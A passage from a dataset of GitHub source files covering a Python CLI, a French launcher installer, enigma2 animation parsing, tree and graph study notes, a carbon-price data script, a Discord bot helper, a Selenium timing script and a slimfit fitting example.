required=True)\n@click.command()\ndef mycli(argu, opt):\n \"\"\"Env is all set!!!!\"\"\"\n print(\"Provided argument is {} and Option is {}\".format(argu, opt))\n\nif __name__ == '__main__':\n mycli()\n","repo_name":"Lakshmisowmya/git_apis_cli","sub_path":"my-cli.py","file_name":"my-cli.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"15857499761","text":"import requests\nimport os\nimport zipfile\n\n# demande où installer l'application\nprint(\"Installateur du launcher de Fastattack\")\nprint(\"Verion de l'installateur: v1.2, version du launcher à installer: v1.2\")\nvarb = True\ndossier = \"\"\nwhile varb:\n dossier = input(\"Dans quel dossier voulez vous installer le launcher 
[chemin valide]: \")\n if dossier.startswith('\"') and dossier.endswith('\"'):\n dossier = dossier.removeprefix('\"')\n dossier = dossier.removesuffix('\"')\n if os.path.isdir(dossier):\n varb = False\n else:\n print(\"Chemin/nom de dossier invalide\")\n\n# demande s'il faut créer un raccourci sur le bureau\nraccourci = input(\"Voulez vous créer un raccourci sur le bureau [Y/n]: \")\nif raccourci == \"Y\":\n racourci = True\nelse:\n raccourci = False\n\n# télécharge le fichier .zip qui contient l'application et les fichiers\nurl = \"https://github.com/fastattackv/Launcher-de-Fastattack/blob/main/T%C3%A9l%C3%A9chargements/Launcher%20de%20Fastattack%20v1.2.zip?raw=true\"\nfilename = dossier + r\"\\Launcher de Fastattack v1.0.zip\"\ntry:\n r = requests.get(url)\nexcept:\n print(\"ERROR: Le fichier à télécharger n'existe pas: essayez d'éxecuter la dernière version de l'application d'installation\")\n input(\"Entrée pour quitter\")\nelse:\n f = open(filename, 'wb')\n f.write(r.content)\n f.close()\n\n# dézip le fichier\n with zipfile.ZipFile(filename, 'r') as zip_ref:\n zip_ref.extractall(dossier)\n\n# supprime le .zip\n os.remove(filename)\n\n# créé le raccourci\n if raccourci:\n import win32com.client\n\n chemin = os.path.join(os.path.join(os.environ['USERPROFILE']), r'Desktop\\Launcher de Fastattack.lnk')\n target = dossier + r\"\\Launcher de Fastattack\\Launcher de Fastattack.exe\"\n\n shell = win32com.client.Dispatch(\"WScript.Shell\")\n shortcut = shell.CreateShortCut(chemin)\n shortcut.Targetpath = target\n shortcut.WindowStyle = 7\n shortcut.save()\n\n print(\"Installation terminée\")\n input(\"Entrée pour quitter\")\n","repo_name":"fastattackv/Launcher-de-Fastattack","sub_path":"Fichiers source (.py)/Installer_launcher_de_Fastattack.py","file_name":"Installer_launcher_de_Fastattack.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"74330749223","text":"from enigma import getDesktop, eSize, ePoint, eMatrix4x4, eFloatAnimation, ePointAnimation, eSizeAnimation, eMatrixAnimation, eLinearInterpolator, eAcclerateInterpolator, eDecelerateInterpolator, eOvershootInterpolator, eBounceInterpolator, eWindowAnimationManager, eWindowAnimationSet\nfrom Tools.Directories import resolveFilename, fileExists, SCOPE_SKIN\nfrom Tools.Log import Log\nimport xml.etree.cElementTree as ET\n\nclass ScreenAnimations(object):\n\tdef __init__(self):\n\t\tself._desktopSize = getDesktop(0).size()\n\n\tdef loadDefault(self):\n\t\tanimset = eWindowAnimationSet.create()\n\t\tanimset.setKey(eWindowAnimationManager.KEY_DISABLED)\n\t\tanimset.setName(_(\"Disable Animations\"))\n\t\teWindowAnimationManager.setAnimationSet(animset)\n\t\tf = resolveFilename(SCOPE_SKIN, \"animations.xml\")\n\t\tif fileExists(f):\n\t\t\tself.fromXML(filesource=f)\n\n\tdef fromXML(self, filesource=None, xml=None):\n\t\tif filesource:\n\t\t\troot = ET.parse(filesource).getroot()\n\t\telse:\n\t\t\troot = ET.fromstring(xml)\n\t\tfor animation in root:\n\t\t\ttry:\n\t\t\t\tattrib = animation.attrib\n\t\t\t\tkey = attrib[\"key\"]\n\t\t\t\tname = _(attrib.get(\"title\", key))\n\t\t\t\tinternal = \"internal\" in attrib\n\t\t\t\tduration = int(attrib.get(\"duration\", 0))\n\t\t\t\talpha = pos = size = matrix = 0\n\t\t\t\talpha_hide = pos_hide = size_hide = rotate_hide = 0\n\n\t\t\t\tfor item in animation:\n\t\t\t\t\tif item.tag == \"alpha\":\n\t\t\t\t\t\talpha = self._buildFloatAnimation(item, duration, 
self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"position\":\n\t\t\t\t\t\tpos = self._buildPointAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"size\":\n\t\t\t\t\t\tsize = self._buildSizeAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"rotate\":\n\t\t\t\t\t\tmatrix = self._buildMatrixAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"alpha_hide\":\n\t\t\t\t\t\talpha_hide = self._buildFloatAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"position_hide\":\n\t\t\t\t\t\tpos_hide = self._buildPointAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"size_hide\":\n\t\t\t\t\t\tsize_hide = self._buildSizeAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"rotate_hide\":\n\t\t\t\t\t\trotate_hide = self._buildMatrixAnimation(item, duration, self._buildInterpolator(attrib))\n\n\t\t\t\tif alpha or pos or size or matrix or alpha_hide or pos_hide or size_hide or rotate_hide:\n\t\t\t\t\tanimset = eWindowAnimationSet.create()\n\t\t\t\t\tanimset.setKey(key)\n\t\t\t\t\tanimset.setName(name)\n\t\t\t\t\tanimset.setInternal(internal)\n\t\t\t\t\tif alpha:\n\t\t\t\t\t\tanimset.setAlpha(alpha)\n\t\t\t\t\tif pos:\n\t\t\t\t\t\tanimset.setPos(pos)\n\t\t\t\t\tif size:\n\t\t\t\t\t\tanimset.setSize(size)\n\t\t\t\t\tif matrix:\n\t\t\t\t\t\tanimset.setMatrix(matrix)\n\t\t\t\t\tif alpha_hide:\n\t\t\t\t\t\tanimset.setAlphaReverse(alpha_hide)\n\t\t\t\t\tif pos_hide:\n\t\t\t\t\t\tanimset.setPosReverse(pos_hide)\n\t\t\t\t\tif size_hide:\n\t\t\t\t\t\tanimset.setSizeReverse(size_hide)\n\t\t\t\t\tif rotate_hide:\n\t\t\t\t\t\tanimset.setMatrixReverse(rotate_hide)\n\t\t\t\t\teWindowAnimationManager.setAnimationSet(animset)\n\n\t\t\texcept Exception as ex:\n\t\t\t\tLog.w(\"FAILED to parse an xml defined animation! 
%s: %s\\n%s\" %(animation.tag, animation.attrib, ex))\n\n#eLinearInterpolator()\n#eAcclerateInterpolator(float factor)\n#eDecelerateInterpolator(float factor)\n#eOvershootInterpolator(float tension = 2.0)\n#eBounceInterpolator()\n\tdef _buildInterpolator(self, attrib):\n\t\tinterpolator = eLinearInterpolator.create() #boring linear is the default\n\t\tkey = attrib.get(\"interpolate\", \"linear\")\n\t\tif key == \"accelerate\":\n\t\t\tif \"factor\" in attrib:\n\t\t\t\tinterpolator = eAcclerateInterpolator.create( float(attrib[\"factor\"]) )\n\t\t\telse:\n\t\t\t\tinterpolator = eAcclerateInterpolator.create()\n\t\telif key == \"decelerate\":\n\t\t\tif \"factor\" in attrib:\n\t\t\t\tinterpolator = eDecelerateInterpolator.create( float(attrib[\"factor\"]) )\n\t\t\telse:\n\t\t\t\tinterpolator = eDecelerateInterpolator.create()\n\t\telif key == \"overshoot\":\n\t\t\tif \"tension\" in attrib:\n\t\t\t\tinterpolator = eOvershootInterpolator.create( float(attrib[\"tension\"]) )\n\t\t\telse:\n\t\t\t\tinterpolator = eOvershootInterpolator.create()\n\t\telif key == \"bounce\":\n\t\t\tinterpolator = eBounceInterpolator.create()\n\n\t\treturn interpolator\n\n#eFloatAnimation(int64_t duration, float from, float to, bool reversed = false, ePtr interpolator=0)\n\tdef _buildFloatAnimation(self, item, duration, interpolator=0):\n\t\tattrs = item.attrib\n\t\tif \"interpolate\" in attrs:\n\t\t\tinterpolator = self._buildInterpolator(attrs)\n\t\tisReverse = item.tag == \"alpha_hide\"\n\t\tfromValue = float(attrs[\"val\"])\n\t\ttoValue = 1.0\n\t\tif isReverse:\n\t\t\treturn eFloatAnimation.create(duration, toValue, fromValue, False, interpolator)\n\t\telse:\n\t\t\treturn eFloatAnimation.create(duration, fromValue, toValue, False, interpolator)\n\n#ePointAnimation(int64_t duration, ePoint from, ePoint to, bool reversed = false, ePtr interpolator=0, bool isReverse=false, bool animateX=true, bool animateY=true)\n\tdef _buildPointAnimation(self, item, duration, interpolator=0):\n\t\tattrs = item.attrib\n\t\tif \"interpolate\" in attrs:\n\t\t\tinterpolator = self._buildInterpolator(attrs)\n\t\tisReverse = item.tag == \"position_hide\"\n\t\tanimateX = \"animateX\" in attrs\n\t\tanimateY = \"animateY\" in attrs\n\t\tif not animateX and not animateY:\n\t\t\tanimateX = animateY = True\n\n\t\tfactor = float(attrs[\"val\"])\n\t\tx = int( self._desktopSize.width() * factor )\n\t\ty = int( self._desktopSize.height() * factor )\n\n\t\tif isReverse:\n\t\t\tfromPos = ePoint()\n\t\t\ttoPos = ePoint(x,y)\n\t\telse:\n\t\t\tfromPos = ePoint(x,y)\n\t\t\ttoPos = ePoint()\n\t\treturn ePointAnimation.create(duration, fromPos, toPos, factor, False, interpolator, isReverse, animateX, animateY)\n\n#eSizeAnimation(int64_t duration, eSize from, eSize to, bool reversed = false, ePtr interpolator=0)\n\tdef _buildSizeAnimation(self, item, duration, interpolator=0):\n\t\tattrs = item.attrib\n\t\tif \"interpolate\" in attrs:\n\t\t\tinterpolator = self._buildInterpolator(attrs)\n\t\tisReverse = item.tag == \"size_hide\"\n\t\tanimateW = \"animateW\" in attrs\n\t\tanimateH = \"animateH\" in attrs\n\t\tcentered = \"centered\" in attrs\n\t\tif not animateW and not animateH:\n\t\t\tanimateW = animateH = True\n\t\tw, h = attrs[\"val\"].split(\",\")\n\t\tw, h = int(w), int(h)\n\t\tfromSize = eSize(w,h)\n\t\ttoSize = eSize()\n\t\treturn eSizeAnimation.create(duration, fromSize, toSize, False, interpolator, isReverse, animateW, animateH, centered)\n\n#eMatrixAnimation(int64_t duration, eMatrix4x4 from, eMatrix4x4 to, bool reversed = false, ePtr 
interpolator=0)\n\tdef _buildMatrixAnimation(self, item, duration, interpolator=0):\n\t\tattrs = item.attrib\n\t\tif \"interpolate\" in attrs:\n\t\t\tinterpolator = self._buildInterpolator(attrs)\n\t\tx,y = float(attrs.get(\"x\", \"0\")), float(attrs.get(\"y\", \"0\"))\n\t\t#z = float(attrs.get(\"z\", \"0\"))\n\t\tfromMatrix = eMatrix4x4.rotateX(x) * eMatrix4x4.rotateY(y)#z axis rotation is currently not suported * eMatrix4x4.rotateZ(z)\n\t\ttoMatrix = eMatrix4x4.identity()\n\t\treturn eMatrixAnimation.create(duration, fromMatrix, toMatrix, False, interpolator)\n","repo_name":"opendreambox/enigma2","sub_path":"usr/lib/enigma2/python/Components/ScreenAnimations.py","file_name":"ScreenAnimations.py","file_ext":"py","file_size_in_byte":6944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"30989693957","text":"\"\"\" Ch 4: Trees and Graphs ~~~~~~~~~~~~~~~~~~~~\n\n* Note that Worst and avg case times may vary\n* Ask lots of clarifying questions! \n* There are many types!\n\nGraphs:\n\t- \n\nTrees\n\t- are a type of graph\n\t- composed of nodes\n\t- has a root node\n\t- each node has 0 or more child nodes\n\t- and so on, recursively\n\nBinary Trees\n\t- A tree where each node has 0-2 children\n\t- 'leaf' is a node w/o children\n\nBinary Search Tree\n\t- A Binary tree is a binary serach tree if\n\tall left descendenc <= n < all right descendents.\n\t- True for each node n\n\t- Clarify where duplicate values should be\n\n\"Balanced\"\n\t- Not perfect, but more or less so\n\t- Approx O(log n) for `insert` and `find`\n\n\"Complete\"\n\t- If you filled it from left to right, as you should,\n\t- The right slot is missing, not the left slot\n\n\"Full Binary Tree\"\n\t- Each node has zero or two children\n\t- No nodes have only one child\n\n\"Perfect Binary Tree\"\n\t- Both full and complete\n\t- All leaf nodes at same level\n\t- If so, a perfect tree has 2^k - 1 nodes\n\n\"Min-Heap\"\n\t- \n\n\"\"\"\n\nclass Node:\n\t\"\"\" A general node for trees or graphs\n\t\t>>> n3 = Node('n3')\n\t\t>>> print(n3)\n\t\tLeaf n3\n\t\t>>> n2 = Node('n2', [n3]), \n\t\t>>> print(n2)\n\t\t(Node n2 [Leaf n3],)\n\t\t>>> n1 = Node('n1', children=[n2, Node('n4')])\n\t\t>>> print(n1)\n\t\tNode n1 [(Node n2 [Leaf n3],), Leaf n4]\n\t\"\"\"\n\n\tdef __init__(self, data, children=[]):\n\t\tself.data = data\n\t\tself.children = children\n\n\tdef __repr__(self):\n\t\t# return self.children\n\t\tif self.children == []:\n\t\t\treturn 'Leaf ' + str(self.data)\n\t\telse:\n\t\t\treturn 'Node ' + str(self.data) + ' ' + str(self.children)\n\n\tdef find_stack(self, data):\n\t\t\"\"\" Return node object w/ this data \n\t\tIterative solution (but can be recursive)\n\n\t\tUses a Stack - LIFO\n\t\t\n\t\tDepth First Search \n\t\t\"\"\"\n\n\t\t# Start a STACK to keep track of nodes to visit.\n\t\tto_visit = [self]\n\n\t\twhile to_visit:\n\t\t\t# Pop the last item on the list\n\t\t\tcurr = to_visit.pop()\n\n\t\t\tif curr.data == data:\n\t\t\t\treturn curr\n\n\t\t\t# Else, it is not them.\n\t\t\t# add children list to end of 'to visit' list\n\t\t\tto_visit.extend(curr.children) \n\n\t\t\t# If they do not have children, they just get popped\n\t\t\t# and you go to the next one in the stack...\n\n\t\tdef find_queue(self, data):\n\t\t\t\"\"\" Return node object w/ this data\n\t\t\tSimply by changing to queue\n\n\t\t\twe can do a FIFO\n\n\t\t\tBreadth First Search!! 
\n\t\t\t\"\"\"\n\n\t\t\t# Goal : get a higher ranking node\n\n\t\t\tto_visit = [self] # QUEUE\n\n\t\t\twhile to_visit:\n\t\t\t\tcurr = to_visit.pop(0) # Get the highest (first in queue)\n\n\t\t\t\tif curr.data == data:\n\t\t\t\t\treturn curr\n\n\t\t\t\t# Else, add all children to the queue\n\t\t\t\tto_visit.extend(curr.children)\n\n\nclass Tree:\n\t\"\"\" Class representing a Tree\n\n\t\t** EXPLAINATION **\n\t\tYou know that a Node is itself a Tree??\n\t\tThat means, it's a little 'extra' to make a Tree class at all.\n\n\t\tSo, here we want to make sure a single node has all\n\t\tthe functionality it needs. That is why Node defines\n\t\ta .find() method!\n\n\t\tAnd here, we wrote a find_in_tree method that literally\n\t\tjust calls the Node.find() method cuz we want to \n\t\tkeep the sexy encapsulation.\n\n\t\"\"\"\n\n\tdef __init__(self, root):\n\t\tself.root = root\n\n\tdef __repr__(self):\n\t\t\"\"\"Reader-friendly representation.\"\"\"\n\t\treturn \"\".format(root=self.root)\n\n\tdef find_in_tree(self, data):\n\t\t\"\"\"Return node object with this data.\n\n\t\tStart at root.\n\t\tUse the method from root to find the data\n\t\tReturn None if not found.\n\n\t\t\"\"\"\n\t\treturn self.root.find(data)\n\n\tdef list_nodes_recursive(self, node):\n\t\tprint(node.data)\n\t\tfor child in node.children:\n\t\t\tlist_nodes_recursive(child)\n\n\nclass BinaryNode:\n\t\"\"\" A Binary Search node for trees or graphs\n\n\t\t# Create root node:\n\t\t>>> bn = BinaryNode(0)\n\t\t>>> print(bn.data, bn.right, bn.left)\n\t\t0 None None\n\n\t\t# Add a new data - creates a new node & decides if it should go right or left:\n\t\t>>> bl = BinaryNode(-1)\n\t\t>>> bn.insert(-1)\n\t\t>>> bn.PrintTree()\n\t\t0\n\n\t\"\"\"\n\tdef __init__(self, data, left=None, right=None):\n\t\t# Doesnt take left and right because we must leave that to the \n\t\t# 'insert' method - that takes care of the ordering of the \n\t\t# new nodes when adding them to the tree.\n\n\t\tself.left = left\n\t\tself.right = right\n\t\tself.data = data\n\n\tdef __repr__(self):\n\t\t\"\"\"Debugging-friendly representation.\"\"\"\n\n\t\treturn \"\".format(data=self.data)\n\n\n\tdef insert(self, data):\n\t\t# Suppose the parent is 'self ' - the root\n\t\t# We want to add one child - new node with data\n\t\t# * Recursively * - with each recursive step, update the self.\n\t\t# Compare the value ' data ' of a new node with the \n\t\t\t# parent node ' self.data ' \n\t\t\t# and decides where to add it to the tree\n\n\t\tprint('self.data', self.data)\n\n\t\tif self.data != None: \n\n\t\t\t# Try the left side\t\t\n\t\t\tif data < self.data:\n\n\t\t\t\t# If left branch is empty, add new node to left\n\t\t\t\tif self.left == None:\n\t\t\t\t\tprint('self.left', self.left)\n\t\t\t\t\tself.left = BinaryNode(data)\n\t\t\t\t\tprint('self.left', self.left)\n\t\t\t\telse:\n\t\t\t\t\tself.left.insert(data) # Recursive call\n\n\t\t\telif data > self.data:\n\t\t\t\tif self.right == None:\n\t\t\t\t\tprint('self.right', self.right)\n\t\t\t\t\tself.right = BinaryNode(data)\n\t\t\t\t\tprint('self.right', self.right)\n\t\t\t\telse:\n\t\t\t\t\tprint('recursive, both branches are full', self.left, self.right)\n\t\t\t\t\tself.right.insert(data)\n\t\telse:\n\t\t\t# If self.data == None, or self.data == data, set self.data to new data\n\t\t\t# We are creating the head with the root?\n\n\n\n\t\t\t# Why: when we initialize the list, we set self but not self.data\n\t\t\t# SO it has an 'empty head'?\n\t\t\tself.data = data\n\n\n\n\tdef find(self, sought):\n\t\t\"\"\" Start at the node 
you're at ( where\n\t\t'self' is treated like a root, every time)\n\n\t\tUse a while loop \n\n\t\tGo through, looking left and right. \n\n\t\tUpdate curr in the 'right direction'\n\n\t\tReturn node with this data. \n\t\tStart at root and return None if not found\n\t\t\"\"\"\n\t\t# Start at the root\n\t\tcurr = self\n\n\t\twhile curr:\n\n\t\t\tprint('checking curr.data', curr.data)\n\n\t\t\tif curr.data == sought:\n\t\t\t\treturn curr\n\n\t\t\telif sought < curr.data:\n\t\t\t\tcurr = curr.left\n\n\t\t\telif sought > curr.data:\n\t\t\t\tcurr = curr.right\n\n\t\treturn \"None\"\n\n\n\n\n\tdef PrintTree(self):\n\t\tif self.left:\n\t\t\tself.left.PrintTree()\n\t\t\tprint(self.data)\n\t\tif self.right:\n\t\t\tself.right.PrintTree()\n\n\t# if __name__ == \"__main__\":\n\n\t# apple = BinaryNode(\"apple\")\n\t# ghost = BinaryNode(\"ghost\")\n\t# fence = BinaryNode(\"fence\", apple, ghost)\n\t# just = BinaryNode('just')\n\t# jackal = BinaryNode(\"jackal\", fence, just)\n\t# zebra = BinaryNode(\"zebra\")\n\t# pencil = BinaryNode(\"pencil\", None, zebra)\n\t# mystic = BinaryNode(\"mystic\")\n\t# pluto = BinaryNode(\"nerd\", mystic, pencil)\n\t# money = BinaryNode(\"money\", jackal, pluto)\n\n\t# print(money.find(\"nerd\"))\n\n\t# root = BinaryNode(12)\n\t# print(root)\n\n\t# root.insert(3)\n\t# root.insert(2)\n\t# root.insert(10)\n\t# root.insert(11)\n\n\n\t# import doctest\n\t# doctest.testmod()\n\n\t# Make a filesystem\n\t# resume = Node(\"resume.txt\", [])\n\t# recipes = Node(\"recipes.txt\", [])\n\t# jane = Node(\"jane/\", [resume, recipes])\n\t# server = Node(\"server.py\", [])\n\t# jessica = Node(\"jessica/\", [server])\n\t# users = Node(\"Users/\", [jane, jessica])\n\t# root = Node(\"/\", [users])\n\n\t# tree = Tree(root)\n\t# print(\"server.py = \", tree.find_in_tree(\"server.py\")) # Will find\n\t# print(\"style.css = \", tree.find_in_tree(\"style.css\")) # will not find\n\n\nclass TreeTraversals:\n\t\"\"\"\n\tTraversals:\n\t- In order traversal\n\t\t\tVisit the left branch, then current, then right\n\t- Pre-order traversal\n\t\t\tVisits the current node before its child nodes\n\t- Post-order traversal\n\t\t\tVisits the current node after its child nodes\n\t\"\"\"\n\tdef in_order_traversal(treeNode):\n\t\t\"\"\" Takes a TreeNode and visits the current nodes before its \n\t\t\tchild nodes\n\t\t\"\"\"\n\t\tif treeNode != None:\n\t\t\tin_order_traversal(node.left)\n\t\t\tvisit(node)\n\t\t\tin_order_traversal(node.right)\n\n\tdef pre_order_traversal(treeNode):\n\t\t\"\"\" Takes a TreeNode and visits the current nodes before its \n\t\t\tchild nodes\n\t\t\"\"\"\n\t\tif treeNode != None:\n\t\t\tvisit(node)\n\t\t\tpre_order_traversal(node.left)\n\t\t\tpre_order_traversal(node.right)\n\n\tdef post_order_traversal(treeNode):\n\t\t\"\"\" Takes a TreeNode and visits the current nodes after its \n\t\t\tchild nodes\n\n\t\t\tThe root will always be the last node visited.\n\t\t\"\"\"\n\t\tif treeNode != None:\n\t\t\t\n\t\t\tpre_order_traversal(node.left)\n\t\t\tpost_order_traversal(node.right)\n\t\t\tvisit(node)\n\n\n# if __name__ == \"__main__\":\n\t# import doctest\n\t# doctest.testmod()\n\n\t# Make a filesystem\n\t# resume = Node(\"resume.txt\", [])\n\t# recipes = Node(\"recipes.txt\", [])\n\t# jane = Node(\"jane/\", [resume, recipes])\n\t# server = Node(\"server.py\", [])\n\t# jessica = Node(\"jessica/\", [server])\n\t# users = Node(\"Users/\", [jane, jessica])\n\t# root = Node(\"/\", [users])\n\n\t# tree = Tree(root)\n\t# print(\"server.py = \", tree.find_in_tree(\"server.py\")) # Will find\n\t# 
print(\"style.css = \", tree.find_in_tree(\"style.css\")) # will not find\n\n\t# pass\n\n\n\nclass GraphNode:\n\n\tdef __init__(self, name, children=None):\n\t\tself.name = name\n\t\tself.children = children\n\n\tdef __repr__(self):\n\t\treturn f'{self.name}- c:{self.children}'\n\n\n\nclass Graph:\n\t\"\"\" Graph class must be used b/c you might not necessarily \n\t\treach all the nodes from a single GraphNode\n\t\"\"\"\n\n\tdef __init__(self, nodes=[]):\n\t\tself.nodes = nodes\n\n\tdef __repr__(self):\n\t\treturn f'ndz:{self.nodes}'\n\n\n\n\n\nif __name__ == \"__main__\":\n\tgn = GraphNode('gn')\n\tprint(gn)\n\n\tg = Graph()\n\tprint(g)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"liv-yaa/Py_Code_Challenges","sub_path":"CTCI_2020/trees-graphs-ch4.py","file_name":"trees-graphs-ch4.py","file_ext":"py","file_size_in_byte":9198,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"26620838051","text":"import pandas as pd\nimport numpy as np\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom sqlalchemy import create_engine\n\nengine = create_engine('mysql+pymysql://root:shero@localhost/sheroDB', echo=True)\n\ndef data_from_csv():\n wti = pd.read_csv('data/WTI_20050630_20200417.csv')\n wti_after_2015 = wti[wti['date'] > '2015-01-11']\n #print(wti_after_2015.head())\n #print(wti_after_2015.describe())\n\n # KAU\n kau18 = pd.read_csv('data/KAU18.csv', header=0,\n names=['date', 'name', 'price', 'diff', 'diff_per', 'high_price',\n 'low_price', 'volume', 'transaction_price', 'weighted_average'])\n kau18_price = kau18[['date', 'price']]\n kau18_price.sort_values(by=['date'], ascending=True, inplace=True,\n kind='mergesort', ignore_index=True)\n day_count = [i for i in range(kau18_price.count()['date'])]\n kau18_price['day'] = day_count\n #print(kau18_price.describe())\n #print(kau18_price.tail())\n\n\n kau19 = pd.read_csv('data/KAU19.csv', header=0,\n names=['date', 'name', 'price', 'diff', 'diff_per', 'high_price',\n 'low_price', 'volume', 'transaction_price', 'weighted_average'])\n kau19_price = kau19[['date', 'price']]\n kau19_price.sort_values(by=['date'], ascending=True, inplace=True,\n kind='mergesort', ignore_index=True)\n day_count = [i for i in range(kau19_price.count()['date'])]\n kau19_price['day'] = day_count\n #print(kau19_price.describe())\n #print(kau19_price.tail())\n\n kau1819 = kau18_price.append(kau19_price, ignore_index=True)\n #print(kau1819)\n\n return (wti_after_2015, kau1819)\n\n\ndef data_from_xls():\n #ELECTRICITY\n elec = pd.read_excel('data/electricity_20140101_20201025.xlsx',\n names=['date', '1', '2', '3', '4', '5', '6', '7', '8'\n , '9', '10', '11', '12', '13', '14', '15', '16'\n , '17', '18', '19', '20', '21', '22', '23', '24'])\n elec_after_2015 = elec[elec['date']>'2015-01-11']\n elec_day = elec_after_2015.sum(axis=1)\n elec_after_2015['elec'] = elec_day\n elec_after_2015.drop(['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12',\n '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24' ], axis='columns', inplace=True)\n # print(elec_after_2015.head())\n\n return (elec_after_2015)\n\ndef scale(df):\n print('')\n\ndef struct_data(wti, elec, kau):\n #유가는 금융시장에서 매겨지기 때문에 시장이 쉬는 날에는 데이터가 없다.\n #전력은 매일 있다.\n #그래서 유가 데이터가 없는 날의 전력 데이터는 없애야 한다.\n df = pd.DataFrame()\n\n for index, row in kau.iterrows() :\n if not wti[wti['date']==row['date']].empty :\n #print(wti[wti['date']==row['date']]['WTI($/bbl)'].values[0])\n new_row = { 'date' : row['date'], 'day' : row['day'], 'price' : 
row['price'],'WTI($/bbl)' : wti[wti['date']==row['date']]['WTI($/bbl)'].values[0] }\n df = df.append(new_row, ignore_index=True)\n df.insert(4,'elec', 0)\n for index, row in df.iterrows() :\n if not elec[elec['date']==row['date']].empty :\n #print(elec[elec['date']==row['date']]['elec'].values[0])\n #new_row = {'elec' : elec[elec['date']==row['date']]['elec'].values[0]}\n #df.loc[index]['elec'] = (elec[elec['date']==row['date']]['elec'].values[0])\n df.loc[index,'elec'] = (elec[elec['date']==row['date']]['elec'].values[0])\n return df\n #print(df.describe())\n #print(df.info())\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\ndef build_model():\n model = keras.Sequential()\n model.add(Dense(16, input_dim = 3, activation='relu'))\n model.add(Dense(8, activation='relu'))\n model.add(Dense(4, activation='relu'))\n model.add(Dense(1, activation='sigmoid'))\n return model\n\n\n\n\nif __name__ == \"__main__\":\n wti, kau = data_from_csv()\n elec = data_from_xls()\n data = struct_data(wti, elec, kau)\n","repo_name":"2020-SKKU-S-HERO/mobius_adaptation","sub_path":"database/price_pred_model.py","file_name":"price_pred_model.py","file_ext":"py","file_size_in_byte":4005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"18252264290","text":"import discord\nimport json\nfrom load_config import load_config\n\nclass Utilies():\n def __init__(self, bot):\n self.bot = bot\n \n async def id_check(self, interaction:discord.Interaction):\n data = load_config()\n if str(interaction.user.id) not in data.owner_ids:\n return False\n else:\n return True\n \n async def save_ids(self, msg_id, chnl_id):\n with open(\"assets/config.json\", \"r\") as f:\n data = json.load(f)\n\n data[\"categories\"][\"channel_id\"] = str(chnl_id)\n data[\"categories\"][\"message_id\"] = str(msg_id)\n\n with open(\"assets/config.json\", \"w\") as f:\n json.dump(data, f, indent=4)\n \n async def user_to_id(self, chnl):\n with open('assets/tickets.json', 'r') as f:\n data = json.load(f)\n \n for value in data.values():\n if value.get('channel_id') == chnl:\n user = value.get('author')\n return user\n\n return None\n","repo_name":"FlickNoJutsu/pyticketbot","sub_path":"core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"15191062955","text":"from selenium import webdriver\r\n# This is a relatively simple response time tester that uses Selenium to retrieve both front and back end response times\r\n# Chrome web driver interface\r\n\r\nPATH = r\"Your chromedriver.exe location\"\r\nhyperlink = \"Whatever site you want to test the response times of\"\r\ndriver = webdriver.Chrome(PATH)\r\ndriver.get(hyperlink)\r\n\r\n# Use Navigation Timing API to calculate the timings that matter the most\r\n\r\nnavigationStart = driver.execute_script(\"return window.performance.timing.navigationStart\")\r\nresponseStart = driver.execute_script(\"return window.performance.timing.responseStart\")\r\ndomComplete = driver.execute_script(\"return window.performance.timing.domComplete\")\r\n\r\n# Calculate the performance\r\nbackendPerformance_calc = responseStart - navigationStart\r\nfrontendPerformance_calc = domComplete - responseStart\r\n\r\nprint(\"Back End: %s\" % backendPerformance_calc + \"ms\")\r\nprint(\"Front End: %s\" % frontendPerformance_calc + 
\"ms\")\r\n\r\ndriver.quit()","repo_name":"tdotmich/Automation","sub_path":"NavigationTestGit.py","file_name":"NavigationTestGit.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"7262957831","text":"# %% [markdown]\n#\n# This example shows how to use `CompositeExpr` to create a custom numerical expression which can\n# be used in slimfit fitting.\n#\n# In this particular example we fit data to a dampened harmonic oscillator, where the time-evolution\n# of the system is solved by `scipy.integrate.solve_ivp`.\n\nfrom __future__ import annotations\n\nimport numpy as np\nimport proplot as pplt\nfrom scipy.integrate import solve_ivp\nfrom sympy import Symbol, Expr, symbols\n\nfrom slimfit import Model, Parameters\nfrom slimfit.fit import Fit\nfrom slimfit.numerical import NumExpr, to_numerical\nfrom slimfit.base import CompositeExpr\n\n\n# %%\n\n# %% [markdown]\n#\n# Generate the GT data to fit the damped harmonic oscillator to, and add some noise.\n\n\ndef ode(x, y):\n return np.sin(2 * np.pi * 0.2 * x) * np.exp(-0.1 * x)\n\n\nnum = 100\nt_eval = np.linspace(0.0, 25, num=num, endpoint=True)\nsol = solve_ivp(ode, (0.0, 25), np.array([-1]), t_eval=t_eval)\n\nydata = sol.y + np.random.normal(0, 0.05, size=num)\ndata = {\"y\": ydata, \"t\": t_eval}\n\n# %%\n\n# %% [markdown]\n#\n# `CompositeExpr` can be subclassed to create a custom numerical expression. The subclass must\n# implement the `__call__` method, which returns a (dictionary of) the numerical values of 